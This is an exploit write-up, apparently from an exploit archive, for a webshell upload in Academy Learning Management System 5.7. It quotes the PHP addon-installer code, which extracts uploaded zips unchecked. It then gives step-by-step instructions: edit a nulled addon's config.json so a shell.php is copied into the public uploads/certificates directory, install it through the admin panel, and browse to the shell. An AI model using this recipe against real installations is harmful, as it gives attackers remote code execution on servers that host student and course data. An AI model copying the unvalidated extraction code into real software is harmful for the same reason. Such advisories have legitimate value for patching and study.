Academy Learning Management System 5.7 Shell Upload

# Exploit Title: Academy Learning Management System 5.7 Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468# Version: 5.7# Tested on Ubuntu 18.04Totally wrong architecture for uploading zip files on install addon ---Vulnerable Source Code ---$zipped_file_name = $_FILES['addon_zip']['name'];    if (!empty($zipped_file_name)) {      // Create update directory.      $dir = 'uploads/addons';      if (!is_dir($dir))      mkdir($dir, 0777, true);      $path = "uploads/addons/".$zipped_file_name;      if (class_exists('ZipArchive')) {        move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);        //Unzip uploaded update file and remove zip file.        $zip = new ZipArchive;        $zip->open($path);        $zip->extractTo('uploads/addons');        $zip->close();        unlink($path);      }else{        $this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));        redirect(site_url('admin/addon'), 'refresh');      }---Exploit------get request route "/admin/addon/add" at admin panel.And then for example download "certificate addon" nulled version.in addons config.json file add""" {            "root_directory"    : "uploads/addons/certificate/others/shell.php",            "update_directory"  : "uploads/certificates/shell.php"        },"""add your webshell to others folder in addon.click install addon button.And ta daa !->get request https://your-url/uploads/certificates/shell.php